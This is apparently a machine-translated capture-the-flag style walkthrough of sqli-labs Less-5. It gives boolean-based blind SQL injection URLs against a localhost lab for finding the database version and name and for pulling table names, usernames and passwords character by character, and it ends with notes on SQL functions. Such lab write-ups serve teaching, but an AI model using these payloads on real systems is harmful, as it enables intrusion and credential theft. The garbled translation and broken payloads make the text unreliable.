Since the 34th and the first and second close are roughly the same, I will not write.
Next comes the first way to write the fifth level.
1 , target site:
Http://127.0.0.1/sqli-labs-master/Less-5/?id=1
When passing the ID of 1, the Prompt "You is in"
2 , find the injection point:
Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' return error
When the above URL is entered, an error is made. We can see the cause of the error from the arrows.
instructions to " 1 ' "brought into the database query, so Presence Injection Point
3 to view version information:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (version (), 1) =5%23
Return to normal
http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (version (), 1) =4%23
return error So the database version is 5.0
4 to determine the length of the database:
Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Length (database ()) = 7%23
return error
Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Length (database ()) = 8%23
Return the correct
Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Length (database ()) = 9%23
return error
so the name of the database is 8 bit composition
5 , guess the database name ( start with the first guess . ):
1> Guess first 1 bit
Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 1) > ' A '%23
Return to normal
Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 1) > ' Z '%23
return error
indicates that the first person a and the Z between
Http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 1) > ' s '%23
Return the correct
so the first place is s
1> Guess first 2 bit
http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 2) > ' SA '%23
Return to normal
http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 2) > ' sz '%23
return error
and between
http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Left (Database (), 2) > ' SE '%23
Return the correct
so the second place is e
and so on until the introduction of the first 8 bits: The last database is Security
6 , guess the database ( Security ) in the table:
http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and ASCII (SUBSTR ((SELECT table_name from Information_ schema.tables WHERE Table_schema = Database () limit A,1)b, 1)) >n
Description
ais from0begin the first few tables,bis for the first few characters,Nis aASCIIThe corresponding decimal number
7 , guess the user:
http://127.0.0.1/sqli-labs-master/ Less-5/?id=1 ' and Ord (Mid ( Select Ifnull (CAST (username as char), 0x20) from s. M A ,1), ,1) = %23
whichSis the database name;Mis the name of the table;Afor the first few users;Bfor the first few characters;Nto beASCIIdecimal number corresponding to the code.
8. guess the user and password:
http://127.0.0.1/sqli-labs-master/ Less-5/?id=1 ' and Ord (Mid ((select Ifnull (CAST (username as char), 0x20) from S.M order by ID limit a ,1 ", b n %23
which S is the database name;M is the table name;A is the number of users;B is the first character; N is the decimal number corresponding to the ASCII code.
Example: http://127.0.0.1/sqli-labs-master/Less-5/?id=1 ' and Ord (Mid ((select Ifnull (CAST (password as char), 0x20) from Security.users order by ID limit 0,1) =68%23
Appendix:
substr () for string addition and subtraction
Ord () Converts the ASCLL code value to the Word Descriptor Example: Ord (' a ') denotes the ordinal number of a in ASSCLL code, which is 97; Ord (' B ') denotes B in the ASSCLL code of the ordinal number, is 98;
Mid (): string intercept function
Syntax: Mid (string, specifies the number of intercept bits, intercept N)
Example
B6=123456789abcdef =mid (b6,1,13) result = 123456789ABCD
Ifnull (EXPR1,EXPR2)
If EXPR1 is not Null,ifnull () returns EXPR1, it returns EXPR2.
Cast () function:
Reference Blog: http://www.studyofnet.com/news/109.html
(1). The argument to the CAST () function is an expression that includes the source value and the target data type separated by the AS keyword. The following example is used to convert the text string ' 12 ' to an integral type:
SELECT CAST (' + ' as int)
(2). The return value is an integer value of 12. What happens if you try to convert a string that represents a decimal to an integer value?
SELECT CAST (' 12.5 ' as int)
(3). Neither the CAST () function nor the CONVERT () function can perform rounding or truncation operations. Since 12.5 cannot be represented by an int data type, a call to this function will produce an error:
Public number
Sqli-labs-master Fifth Less-5 Double Query-single: Way One